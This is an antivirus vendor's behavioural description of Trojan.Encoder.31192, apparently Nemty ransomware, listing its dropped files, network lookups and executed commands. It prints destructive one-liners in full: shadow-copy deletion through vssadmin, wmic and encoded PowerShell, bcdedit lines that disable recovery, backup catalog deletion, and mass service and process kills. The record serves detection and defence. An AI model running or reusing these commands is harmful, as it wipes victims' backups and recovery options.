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Trojan.Encoder.31192

Added to the Dr.Web virus database: 2020-03-08

Virus description added:

Technical Information

To ensure autorun and distribution
Creates the following files on removable media
  • <Drive name for removable media>:\nemty_kdmw28x-decrypt.txt
  • <Drive name for removable media>:\join.avi
  • <Drive name for removable media>:\000814251_video_01.avi
  • <Drive name for removable media>:\tileimage.bmp
  • <Drive name for removable media>:\dashborder_96.bmp
  • <Drive name for removable media>:\dashborder_144.bmp
  • <Drive name for removable media>:\dashborder_192.bmp
  • <Drive name for removable media>:\testcertificate.cer
  • <Drive name for removable media>:\sdkfailsafeemulator.cer
  • <Drive name for removable media>:\testee.cer
  • <Drive name for removable media>:\contoso_1.cer
  • <Drive name for removable media>:\contoso.cer
  • <Drive name for removable media>:\february_catalogue__2015.doc
Malicious functions
To complicate detection of its presence in the operating system,
deletes volume shadow copies.
Executes the following
  • '%WINDIR%\syswow64\net.exe' stop DbxSvc
  • '%WINDIR%\syswow64\taskkill.exe' /f /im sql.*
  • '%WINDIR%\syswow64\net.exe' stop OracleXETNSListener
  • '%WINDIR%\syswow64\net.exe' stop OracleServiceXE
  • '%WINDIR%\syswow64\net.exe' stop AcrSch2Svc
Modifies file system
Creates the following files
  • %APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\917b685c402c569c7ef15953ac01f631_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
  • %APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\d860c3add425c732002dea04eb2c98f0_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
  • C:\nemty_kdmw28x-decrypt.txt
  • C:\documents and settings\nemty_kdmw28x-decrypt.txt
  • C:\far2\nemty_kdmw28x-decrypt.txt
  • D:\nemty_kdmw28x-decrypt.txt
  • C:\far2\addons\nemty_kdmw28x-decrypt.txt
  • C:\far2\addons\colors\nemty_kdmw28x-decrypt.txt
  • C:\far2\addons\colors\custom_highlighting\nemty_kdmw28x-decrypt.txt
Network activity
TCP
HTTP GET requests
  • http://ap#.#pify.org/
  • http://ap#.#b-ip.com/v2/free/95.211.190.199/countryName
UDP
  • DNS ASK ap#.#pify.org
  • DNS ASK ap#.#b-ip.com
  • DNS ASK ne##y10.biz
Miscellaneous
Creates and executes the following
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=A: /on=A: /maxsize=401MB' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=A: /on=A: /maxsize=unbounded' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=D: /on=D: /maxsize=401MB' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=D: /on=D: /maxsize=unbounded' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=F: /on=F: /maxsize=401MB' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=F: /on=F: /maxsize=unbounded' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.*...' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /c net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS ...' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /c bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete' (with hidden window)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==' (with hidden window)
Executes the following
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=A: /on=A: /maxsize=401MB
  • '%WINDIR%\syswow64\net1.exe' stop DbxSvc
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  • '%WINDIR%\syswow64\cmd.exe' /c bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete
  • '%WINDIR%\syswow64\cmd.exe' /c net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS ...
  • '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.*...
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=D: /on=D: /maxsize=401MB
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=F: /on=F: /maxsize=401MB
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=D: /on=D: /maxsize=unbounded
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=C: /on=C: /maxsize=unbounded
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=F: /on=F: /maxsize=unbounded
  • '<SYSTEM32>\vssvc.exe'
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=C: /on=C: /maxsize=401MB
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=F: /on=F: /maxsize=unbounded
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=F: /on=F: /maxsize=401MB
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=D: /on=D: /maxsize=unbounded
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=D: /on=D: /maxsize=401MB
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=A: /on=A: /maxsize=401MB
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=A: /on=A: /maxsize=unbounded
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=A: /on=A: /maxsize=unbounded
  • '%WINDIR%\syswow64\net1.exe' stop OracleXETNSListener
  • '%WINDIR%\syswow64\net1.exe' stop OracleServiceXE

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
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